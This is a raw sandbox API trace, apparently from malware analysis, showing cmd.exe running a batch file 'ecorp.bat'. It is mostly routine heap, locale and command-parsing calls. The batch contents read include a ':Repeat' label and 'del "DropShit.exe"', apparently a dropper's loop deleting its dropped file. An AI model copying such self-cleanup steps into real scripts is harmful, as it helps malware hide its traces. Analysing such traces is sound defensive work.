HALPmcxz\\Desktop") returned 0x25 [0091.611] GetProcessHeap () returned 0x250000 [0091.611] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251320 | out: hHeap=0x250000) returned 1 [0091.611] GetProcessHeap () returned 0x250000 [0091.611] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4016) returned 0x26ccf0 [0091.611] GetProcessHeap () returned 0x250000 [0091.611] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x7e) returned 0x26b7b0 [0091.611] GetProcessHeap () returned 0x250000 [0091.611] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4010) returned 0x270d10 [0091.612] GetProcessHeap () returned 0x250000 [0091.612] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4010) returned 0x274d30 [0091.612] GetProcessHeap () returned 0x250000 [0091.612] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.612] GetConsoleOutputCP () returned 0x1b5 [0091.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.612] GetUserDefaultLCID () returned 0x409 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9b7b50, cchData=8 | out: lpLCData=":") returned 2 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f660, cchData=128 | out: lpLCData="0") returned 2 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f660, cchData=128 | out: lpLCData="0") returned 2 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f660, cchData=128 | out: lpLCData="1") returned 2 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9ca740, cchData=8 | out: lpLCData="/") returned 2 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9ca4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9ca460, cchData=32 | out: lpLCData="Tue") returned 4 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9ca420, cchData=32 | out: lpLCData="Wed") returned 4 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9ca3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9ca3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9ca360, cchData=32 | out: lpLCData="Sat") returned 4 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9ca700, cchData=32 | out: lpLCData="Sun") returned 4 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9b7b40, cchData=8 | out: lpLCData=".") returned 2 [0091.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9ca4e0, cchData=8 | out: lpLCData=",") returned 2 [0091.613] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0091.614] GetProcessHeap () returned 0x250000 [0091.614] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x20c) returned 0x26b8b0 [0091.614] GetConsoleTitleW (in: lpConsoleTitle=0x26b8b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.614] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0091.614] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0091.614] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0091.614] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0091.615] GetProcessHeap () returned 0x250000 [0091.615] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26ccf0 [0091.615] GetProcessHeap () returned 0x250000 [0091.615] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.616] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\"", _String2=")") returned -7 [0091.616] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\"") returned 68 [0091.616] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\"") returned 68 [0091.616] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\"") returned 71 [0091.616] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\"") returned 71 [0091.616] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\"") returned 80 [0091.616] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\"") returned 80 [0091.616] GetProcessHeap () returned 0x250000 [0091.616] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26bad0 [0091.616] GetProcessHeap () returned 0x250000 [0091.616] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x74) returned 0x26bb90 [0091.616] GetProcessHeap () returned 0x250000 [0091.616] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x14) returned 0x268950 [0091.617] GetConsoleTitleW (in: lpConsoleTitle=0x14f570, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.617] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat\"")) returned 0xffffffff [0091.617] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0091.617] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0091.617] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0091.617] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0091.617] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0091.617] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0091.617] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0091.617] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0091.617] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0091.617] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0091.617] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0091.617] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0091.617] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0091.617] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0091.617] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0091.617] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0091.617] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0091.617] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0091.617] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0091.617] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0091.617] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0091.617] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0091.617] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0091.618] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0091.618] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0091.618] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0091.618] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0091.618] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0091.618] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0091.618] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0091.618] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0091.618] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0091.618] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0091.618] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0091.618] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0091.618] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0091.618] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0091.618] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0091.618] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0091.618] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0091.618] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0091.618] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0091.618] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0091.618] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0091.618] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0091.618] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0091.665] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0091.665] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0091.665] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0091.666] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0091.666] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0091.666] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0091.666] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0091.666] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0091.666] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0091.666] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0091.666] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0091.666] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0091.666] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0091.666] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0091.666] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0091.666] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0091.666] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0091.666] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0091.666] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0091.666] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0091.666] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0091.666] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0091.666] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0091.666] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0091.666] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0091.666] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0091.666] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0091.666] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0091.666] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0091.666] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0091.666] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0091.666] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0091.666] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0091.666] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0091.666] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0091.666] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0091.666] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0091.666] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0091.666] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0091.666] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0091.666] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0091.666] GetProcessHeap () returned 0x250000 [0091.667] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x26bc10 [0091.667] GetProcessHeap () returned 0x250000 [0091.667] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x78) returned 0x26be30 [0091.667] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0091.667] GetProcessHeap () returned 0x250000 [0091.667] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x420) returned 0x251320 [0091.667] SetErrorMode (uMode=0x0) returned 0x0 [0091.668] SetErrorMode (uMode=0x1) returned 0x0 [0091.668] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x251330, lpFilePart=0x14ee00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14ee00*="Desktop") returned 0x25 [0091.668] SetErrorMode (uMode=0x0) returned 0x1 [0091.668] GetProcessHeap () returned 0x250000 [0091.668] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x251320, Size=0x70) returned 0x251320 [0091.668] GetProcessHeap () returned 0x250000 [0091.668] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x251320) returned 0x70 [0091.668] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0091.668] GetProcessHeap () returned 0x250000 [0091.668] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x62) returned 0x26beb0 [0091.668] GetProcessHeap () returned 0x250000 [0091.668] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26bf20 [0091.668] GetProcessHeap () returned 0x250000 [0091.668] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26bf20, Size=0x62) returned 0x26bf20 [0091.668] GetProcessHeap () returned 0x250000 [0091.668] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26bf20) returned 0x62 [0091.668] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.668] GetProcessHeap () returned 0x250000 [0091.668] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xe8) returned 0x26bfa0 [0091.671] GetProcessHeap () returned 0x250000 [0091.671] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26bfa0, Size=0x7e) returned 0x26bfa0 [0091.671] GetProcessHeap () returned 0x250000 [0091.671] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26bfa0) returned 0x7e [0091.672] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0091.672] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat", fInfoLevelId=0x1, lpFindFileData=0x14eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb70) returned 0x26c030 [0091.672] GetProcessHeap () returned 0x250000 [0091.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x28) returned 0x2645e0 [0091.672] FindClose (in: hFindFile=0x26c030 | out: hFindFile=0x26c030) returned 1 [0091.672] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0091.672] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0091.672] GetConsoleTitleW (in: lpConsoleTitle=0x14f0c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.672] GetProcessHeap () returned 0x250000 [0091.672] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1e8) returned 0x2513a0 [0091.672] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdbf0000 [0091.677] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferIdentifyLevel") returned 0x7fefdc0e470 [0091.677] IdentifyCodeAuthzLevelW () returned 0x1 [0091.682] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefdc0f9b0 [0091.682] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0091.682] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="SaferCloseLevel") returned 0x7fefdc0f660 [0091.683] CloseCodeAuthzLevel () returned 0x1 [0091.683] SetErrorMode (uMode=0x0) returned 0x0 [0091.683] SetErrorMode (uMode=0x1) returned 0x0 [0091.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat", nBufferLength=0x104, lpBuffer=0x26bc20, lpFilePart=0x14eef0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat", lpFilePart=0x14eef0*="ecorp.bat") returned 0x2f [0091.683] SetErrorMode (uMode=0x0) returned 0x1 [0091.683] GetProcessHeap () returned 0x250000 [0091.683] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x74) returned 0x251840 [0091.683] wcsspn (_String=" ", _Control=" \x09") returned 0x1 [0091.683] GetProcessHeap () returned 0x250000 [0091.683] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x12) returned 0x27a2d0 [0091.683] GetProcessHeap () returned 0x250000 [0091.683] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x14) returned 0x27a2f0 [0091.683] GetProcessHeap () returned 0x250000 [0091.683] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x27a2f0, Size=0x14) returned 0x27a310 [0091.683] GetProcessHeap () returned 0x250000 [0091.683] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x27a310) returned 0x14 [0091.683] CmdBatNotification () returned 0x0 [0091.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.683] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.683] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.683] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.684] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.684] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.684] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x51, lpOverlapped=0x0) returned 1 [0091.685] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.685] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr=":Repeat\r\n") returned 9 [0091.685] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.685] GetFileType (hFile=0x5c) returned 0x1 [0091.685] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.685] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.685] GetProcessHeap () returned 0x250000 [0091.685] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26ccf0 [0091.685] GetProcessHeap () returned 0x250000 [0091.685] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.686] _tell (_FileHandle=3) returned 9 [0091.686] _close (_FileHandle=3) returned 0 [0091.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.686] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.686] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.686] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.686] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.686] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.687] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0091.687] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.687] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\n") returned 20 [0091.687] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.687] GetFileType (hFile=0x5c) returned 0x1 [0091.687] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.687] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.687] GetProcessHeap () returned 0x250000 [0091.687] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26ccf0 [0091.687] GetProcessHeap () returned 0x250000 [0091.687] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.687] _wcsicmp (_String1="del", _String2=")") returned 59 [0091.687] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0091.688] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0091.688] _wcsicmp (_String1="IF", _String2="del") returned 5 [0091.688] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0091.688] _wcsicmp (_String1="REM", _String2="del") returned 14 [0091.688] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0091.688] GetProcessHeap () returned 0x250000 [0091.688] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x2518c0 [0091.688] GetProcessHeap () returned 0x250000 [0091.688] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0091.688] GetProcessHeap () returned 0x250000 [0091.688] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0091.689] _tell (_FileHandle=3) returned 29 [0091.689] _close (_FileHandle=3) returned 0 [0091.689] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.689] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.689] GetFileType (hFile=0x7) returned 0x2 [0091.689] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.689] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.689] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.689] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.690] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0091.690] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.690] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.690] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.690] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.690] GetFileType (hFile=0x7) returned 0x2 [0091.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.690] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.690] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.690] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.691] GetFileType (hFile=0x7) returned 0x2 [0091.691] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.691] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0091.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.691] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0091.691] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0091.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.691] GetFileType (hFile=0x7) returned 0x2 [0091.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.692] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.692] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0091.692] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.692] GetFileType (hFile=0x7) returned 0x2 [0091.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.692] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.692] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.693] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0091.693] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0091.693] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0091.693] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.693] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0091.693] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0091.693] 